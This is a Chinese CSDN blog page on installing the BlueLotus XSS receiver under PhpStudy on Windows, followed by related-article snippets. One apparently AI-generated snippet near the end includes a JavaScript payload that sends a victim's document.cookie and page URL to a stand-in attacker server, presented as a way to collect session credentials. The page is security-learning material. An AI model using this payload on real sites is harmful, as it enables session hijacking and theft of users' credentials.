XSS测试平台——BlueLotus(Windows系统)下载与安装

已于 2023-11-10 18:20:45 修改
阅读量3.6k 收藏 8
点赞数 1
CC 4.0 BY-SA版权
文章标签: php 网络安全 xss web安全
于 2022-12-08 16:48:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/edsion4/article/details/128238105
本文详细介绍了如何在Windows系统下的PhpStudy环境中安装BlueLotus XSS工具。包括下载、配置及使用流程,帮助读者快速上手。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

BlueLotus(Windows系统)安装需要在PhpStudy环境下,关于PhpStudy的安装请看:

(34条消息) Windows下sqli-labs靶场搭建与相关环境——PhpStudy安装_雅士清弦的博客-CSDN博客

本帖主要记录了自己在学习XSS过程中安装BlueLotus过程。

一:下载BlueLotus

BlueLotus下载地址:GitHub - trysec/BlueLotus_XSSReceiver: XSS平台 CTF工具 Web安全工具

  二:安装BlueLotus

        1:将下载文件解压到  WWW 目录下

         3:开启PhpStudy的apache与mysql

         4:浏览器输入:PhpStudy默认ip/文件夹名/login.php 如:       

         127.0.0.1/blueLotus_xssreceiver/login.php

 

         5:点击安装,记住后台登陆密码跟数据加密密码,然后提交,按步骤输入密码登录

         6:安装完成,就可以正常使用啦

雅士清弦
关注
BlueLotus安装及使用
qq_52358808的博客
08-30 9220
BlueLotus概述安装简单使用 概述 BlueLotus是清华大学蓝莲花战队所写的xss测试平台XSS测试平台是测试XSS漏洞获取cookie并接收Web⻚⾯的平台,XSS可以做JS能做的所有事,包括但不 限于窃取cookie、后台增删改⽂章、钓⻥、利⽤XSS漏洞进⾏传播、修改⽹⻚代码、⽹站重定向、获取⽤ 户信息等。 该平台后端语⾔是PHP,⽆sql版,所以 想要使⽤该平台需要要php的环境。而且需要搭建在自己的云服务器上。 地址:https://github.com/trysec/BlueLotus
xss测试平台搭建
xdjxi的博客
03-16 5430
1.拉取镜像 docker pull daocloud.io/library/mysql:5.6 2.运行mysql服务,密码为root,端口号为3306 docker run --name mysqlserver -e MYSQL_ROOT_PASSWORD=root -d -i -p 3306:3306 daocloud.io/library/mysql:5.6 3. 搭建xss测试平台,拉取镜像 docker pull daxia/websafe 4. 运行容器 docker run --n..
XSS详解
最新发布
wangzhemvp的博客
04-21 685
主要时xssplatform开发较早已经不更新了,所以还是用的之前的php版本。接着我们执行一条sql语句,因为xss数据库里面的sql文件里面的站点域名是作者的,我们将其更新替换成自己的。这里用的别人的图,数据库名用xssplatform,前面的config.php对应;注册成功了之后我们到phpmyadmin的xss数据库里面将admin升级成管理员。访问http://127.0.0.1/xss,注册admin/123456。下载了之后,将其解压在www目录下的XSS目录下。执行后可以看到更新成功。
BlueLotus 下载安装使用
天泽岁月
02-07 2212
BlueLotus 下载安装使用
XSS测试平台.zip
08-06
XSS测试平台是测试XSS漏洞获取cookie并接收Web页面的平台
Xss测试平台.zip
03-06
XSSer——用于检测和利用XSS漏洞的自动Web测试框架工具 XSS是一种非常常见的漏洞类型,它分布非常广泛,且比较容易被检测到。 攻击者可以在无需验证的情况下将不受信任的JavaScript片段插入到应用程序中。然后,该JavaScript片段将会被访问目标站点的受害者执行。https://gbhackers.com/a3-cross-site-scripting-xss/ 跨站点“Scripter”(又名Xsser)是一个自动框架,用于检测、利用和报告基于Web的应用程序中的XSS漏洞。 它包含几个可以绕过某些过滤器的选项,以及各种特殊的代码注入技术。
XSS测试平台
weixin_33739646的博客
02-26 270
http://x.0x9.cc/index.php?do=register http://www.webxss.cn/index.php?do=register 转载于:https://blog.51cto.com/quiterr/1745248
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
XSS 蓝莲花-数据接收平台_pikachu靶场
2301_81238641的博客
06-10 761
BlueLotus_XSSReceiver-master.zip 解压到phpstudy_pro 的WWW目录下,我建议改一下文件名,短一些方便登录。网盘链接:https://pan.baidu.com/s/1a3HO1avUNF5BhowZzTfVfQ?如果没有修改文件名的话就输入完整的 127.0.0.1/BlueLotus_XSSReceiver-master。可以复制src链接到网页中查看是否生成成功了,像这样子就是生成成功了的。我就添加个0改为200了,然后再在输入框输入js代码。
利用蓝莲花BlueLotus通过XSS获取Cookie
weixin_74761057的博客
07-23 735
蓝莲花BlueLotus_XSSReceiver清华大学蓝莲花战队做的一个平台,优点是足够小,不需要数据库,只要有个能运行php的环境就可以了,缺点是一般只适合一个人用。
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
xsser测试平台
12-30
配合phpstudy工具搭建了xsser.me平台,主要用于检测xss漏洞,并对其进行利用
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
完善版XSS平台源码 【40多个模块】,xss源码下载,PHP源码.zip.zip
10-14
完善版XSS平台源码 【40多个模块】,xss源码下载,PHP源码.zip.zip
XSS平台源码(xsser.me)
12-27
XSS平台源码(xsser.me)
xss测试工具(xsstrike基于python)
全栈菜鸟的博客
04-28 3923
xsstrike很强 项目地址: https://github.com/s0md3v/XSStrike 安装: git clone https://github.com/s0md3v/XSStrike.git 使用文档: https://github.com/s0md3v/XSStrike/wiki/Usage usage: xsstrike.py [-h] [...
xss平台测试
weixin_33716557的博客
03-26 369
2019独角兽企业重金招聘Python工程师标准>>> ...
Windows上搭建XSS测试平台
afei001
07-12 1416
目录 一、实验环境 二、Windows上搭建XSS测试平台 1.将XSS源码解压到wamp的网站发布目录 2.创建XSS数据库并导入sql文件 3.修改oc_module表 4.修改config.php文件 5.修改配置文件 6.重启wamp并注册XSS账号 7.创建.htaccess文件 三、开启邀请码注册 1.数据库用户授权 2.修改config.php文件 3.浏览器访问获得邀请码 4.使用邀请码注册用户 一、实验环境 操作系统Windows 10...
Bluelotus使用方法
03-31
### Bluelotus 的使用方法 Bluelotus 是由清华大学蓝莲花战队开发的一个 XSS 测试平台,主要用于测试跨站脚本攻击 (XSS) 漏洞以及捕获 Cookie 和其他敏感数据。以下是关于其使用的详细介绍: #### 1. 下载解压 首先需要从官方仓库下载 BlueLotus 的压缩包,并将其解压到指定路径: ```bash wget https://github.com/trysec/BlueLotus_XSSReceiver/archive/master.zip -O bluelotus.zip unzip -d /opt/bluelotus bluelotus.zip ``` 上述命令会将 BlueLotus 解压至 `/opt/bluelotus` 路径下[^1]。 #### 2. 数据库配置 为了存储接收到的数据(如 Cookies),需设置 MySQL 数据库支持。具体操作如下: - 登录 MySQL 并创建名为 `bluelotus` 的新数据库; - 导入项目附带的 SQL 文件完成表结构初始化。 ```sql CREATE DATABASE bluelotus; USE bluelotus; SOURCE /path/to/BlueLotus_XSSReceiver/database.sql; ``` 此过程确保了后端能够正常连接并写入数据[^2]。 #### 3. PHP 环境准备 由于 BlueLotus 后端基于 PHP 实现,因此运行前必须确认服务器已安装 LAMP/WAMP 堆栈及相关依赖项。通常情况下,推荐版本为 PHP >=7.x 及以上[^4]。 #### 4. 配置 Web 服务 编辑 Apache/Nginx 配置文件指向 BlueLotus 所在目录作为根站点位置;同时调整权限允许外部访问接口功能。例如,在 Apache 中可添加虚拟主机条目: ```apache <VirtualHost *:80> ServerName your-domain-or-ip-address DocumentRoot "/opt/bluelotus" </VirtualHost> ``` #### 5. 初始化启动 完成前期准备工作之后即可开启服务程序并通过浏览器验证页面加载情况。默认登录界面位于 http://your-server-address/index.php ,初次进入可能提示进一步参数设定,请按照指引填写完毕后再继续后续实验环节。 #### 6. 利用场景模拟 当一切就绪以后就可以着手设计实际应用场景下的恶意 JavaScript 注入代码片段来触发目标用户的浏览器向我们的接收器发送请求携带所需信息比如 session cookies 。下面给出一段简单的示范脚本供参考学习之用 : ```javascript (function(){ var img=new Image(); img.src="http://attacker_server_ip_or_domain/log?c="+document.cookie+"&u="+encodeURIComponent(window.location.href); })(); ``` 一旦受害者点击含有此类隐藏图片标签链接或者浏览被注入相应 js 的网页就会自动把当前网站关联的身份认证凭据提交给预先布置好的监听节点从而实现预期目的即收集泄露出来的隐私资料。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值